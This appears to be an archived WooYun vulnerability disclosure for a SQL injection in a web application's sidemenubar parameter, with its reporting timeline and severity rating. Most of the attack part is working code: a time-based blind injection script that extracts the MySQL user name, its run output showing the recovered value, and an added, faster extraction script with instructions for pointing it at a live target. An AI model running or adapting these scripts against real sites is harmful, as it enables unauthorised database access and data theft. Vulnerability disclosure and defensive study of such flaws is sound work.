WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --------http://drop.zone.ci/
2016-01-11: Details reported to the vendor, awaiting vendor response
2016-01-13: Vendor confirmed; details disclosed to the vendor only
2016-01-23: Details disclosed to core white hats and relevant domain experts
2016-02-02: Details disclosed to regular white hats
2016-02-12: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public
Injection point:
http://**.**.**.**/modules.php?page=%E8%A1%8C%E6%94%BF%E4%BA%BA%E5%93%A1&sidemenubar=2,2
The sidemenubar parameter is vulnerable to boolean-based injection:
Normal response, identical to the response with "and 1=1" appended (screenshot not reproduced here)
Abnormal response after appending a single quote, identical to the response with "and 1=2" appended (screenshot not reproduced here)
Attached verification script:
import requests
import time

# Characters tried at each position. The original list read "abcdefghigklmn..."
# (a second 'g' where 'j' belongs); corrected here.
payloads = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@_.'
user = ''
print('Start to retrive Mysql user:')
for i in range(1, 23):                       # read up to 22 characters of user()
    for payload in payloads:
        starttime = time.time()
        # Time-based blind payload. sidemenubar is numeric, so no quote is needed;
        # the query sleeps 1 s when the i-th character of user() equals the guess.
        s = "19 and if(ascii(mid(user() from (%s) for 1))=%s,sleep(1),1)" % (i, ord(payload))
        param = {'sidemenubar': s}
        # sidemenubar appears twice in the request (once in the URL, once from params);
        # PHP keeps the last value of a repeated GET key, so the injected one is used.
        response = requests.get('http://**.**.**.**/modules.php?page=%E8%A1%8C%E6%94%BF%E4%BA%BA%E5%93%A1&sidemenubar=2,2', params=param)
        if time.time() - starttime > 2:      # fixed threshold: any response slower than 2 s counts as a hit
            user += payload
            print('\n user is:', user, end='')
            break
        else:
            print('.', end='')
print('\n[Done] mysql user is %s' % user)
Returned result, included only to verify that the injection exists:
C:\Users\Administrator>python C:\Users\Administrator\Desktop\223.py
Start to retrive Mysql user:
 user is: A . . . . . . . . . . . . . .
 user is: AO . . .
 user is: AOD . . . . . . . .
 user is: AODI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 user is: AODI1 . .
 user is: AODI1C . . . .
 user is: AODI1CE .
 user is: AODI1CEB . .
 user is: AODI1CEBC
 user is: AODI1CEBCA
 user is: AODI1CEBCAA . . . . . . . . . . . . . .
 user is: AODI1CEBCAAO
 user is: AODI1CEBCAAOA
 user is: AODI1CEBCAAOAA . . . . . . . . . . .
 user is: AODI1CEBCAAOAAL .
 user is: AODI1CEBCAAOAALB . . .
 user is: AODI1CEBCAAOAALBD . .
 user is: AODI1CEBCAAOAALBDC .
 user is: AODI1CEBCAAOAALBDCB . . .
 user is: AODI1CEBCAAOAALBDCBD . . .
 user is: AODI1CEBCAAOAALBDCBDD . . . . . . . .
 user is: AODI1CEBCAAOAALBDCBDDI
[Done] mysql user is AODI1CEBCAAOAALBDCBDDI
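The script above finds each character by a linear scan over a fixed alphabet and records a hit whenever a response takes more than 2 s, so any single slow request, from the network or the server, is accepted as a matching character. The following is an added example, not code from the original report: the same sleep(1) condition on sidemenubar, but with the byte value found by binary search (7 requests per character instead of up to 65), the threshold calibrated from a condition that can never be true, and every character confirmed with an equality query before it is accepted. It runs against a constructed local oracle (simulated_timed_request, which assumes a user() value of webapp@localhost and fakes the latency, so nothing is sent anywhere); http_timed_request is the equivalent transport for a live target, and the base URL it takes is a placeholder the caller supplies.

```python
import re
import time
import urllib.parse
import urllib.request

SLEEP_SECONDS = 1                   # the sleep(1) used by the report's payload
PAGE = "行政人员"                    # the page= value, percent-encoded in the report's URL

# ---- constructed stand-in for the vulnerable target (assumption, not real data) ----
SIMULATED_USER = "webapp@localhost"  # assumed user(); the real target's value is unknown
_PAYLOAD_RE = re.compile(
    r"^19 and if\(ascii\(mid\(user\(\) from \((\d+)\) for 1\)\)([<>=])(\d+),sleep\(\d+\),1\)$")
_calls = [0]


def simulated_timed_request(payload):
    """Parse the report's payload shape, evaluate the condition against
    SIMULATED_USER and return a fake elapsed time: 0.30-0.39 s of deterministic
    'jitter', plus SLEEP_SECONDS when the condition holds. No sleeping, no network."""
    m = _PAYLOAD_RE.match(payload)
    if not m:
        raise ValueError("unexpected payload: " + payload)
    pos, op, val = int(m.group(1)), m.group(2), int(m.group(3))
    # MySQL: mid() past the end of the string yields '' and ascii('') is 0
    ch = ord(SIMULATED_USER[pos - 1]) if pos <= len(SIMULATED_USER) else 0
    cond = {"<": ch < val, ">": ch > val, "=": ch == val}[op]
    _calls[0] += 1
    jitter = (_calls[0] * 7919 % 100) / 1000.0
    return 0.30 + jitter + (SLEEP_SECONDS if cond else 0)


def http_timed_request(base_url, payload):
    """Transport for a live target (not exercised here): one GET with the
    injected sidemenubar, returning wall-clock seconds. Unlike the report's
    script, sidemenubar is sent once rather than once in the URL and once in params."""
    qs = urllib.parse.urlencode({"page": PAGE, "sidemenubar": payload})
    url = base_url.rstrip("/") + "/modules.php?" + qs
    start = time.time()
    with urllib.request.urlopen(url, timeout=30) as resp:
        resp.read()
    return time.time() - start


def payload_for(pos, op, val):
    """Same condition the report uses, parameterised on position, operator and value."""
    return "19 and if(ascii(mid(user() from (%d) for 1))%s%d,sleep(%d),1)" % (
        pos, op, val, SLEEP_SECONDS)


def calibrate(timed_request, samples=5):
    """Measure a condition that cannot hold (ascii(...) > 255) and put the
    threshold halfway between the slowest baseline response and baseline + sleep,
    instead of the fixed 2 s cut-off the report's script uses."""
    baseline = max(timed_request(payload_for(1, ">", 255)) for _ in range(samples))
    return baseline + SLEEP_SECONDS / 2.0


def extract_user(timed_request, max_len=64):
    """Recover user() byte by byte: binary search on '>' comparisons, then an
    '=' query to confirm the byte before it is trusted."""
    threshold = calibrate(timed_request)

    def truth(pos, op, val):
        return timed_request(payload_for(pos, op, val)) > threshold

    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                   # user() is 'name@host', ASCII only
        while lo < hi:                    # 7 queries per byte
            mid = (lo + hi) // 2
            if truth(pos, ">", mid):
                lo = mid + 1
            else:
                hi = mid
        if not truth(pos, "=", lo):       # a timing artefact would fail this re-check
            raise RuntimeError("byte %d not confirmed; recalibrate and retry" % pos)
        if lo == 0:                       # ascii('') == 0: end of the string
            return out
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("[simulated] user() =", extract_user(simulated_timed_request))
```

The end of the string is detected because MySQL's mid() returns '' once the position is past the last character and ascii('') is 0, so the search for that position converges on 0. To use the same code against a live target, pass a closure such as lambda p: http_timed_request("http://target/", p) in place of simulated_timed_request.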
Severity: High
Vulnerability Rank: 16
Confirmed: 2016-01-13 16:46
Thanks for the report
None for now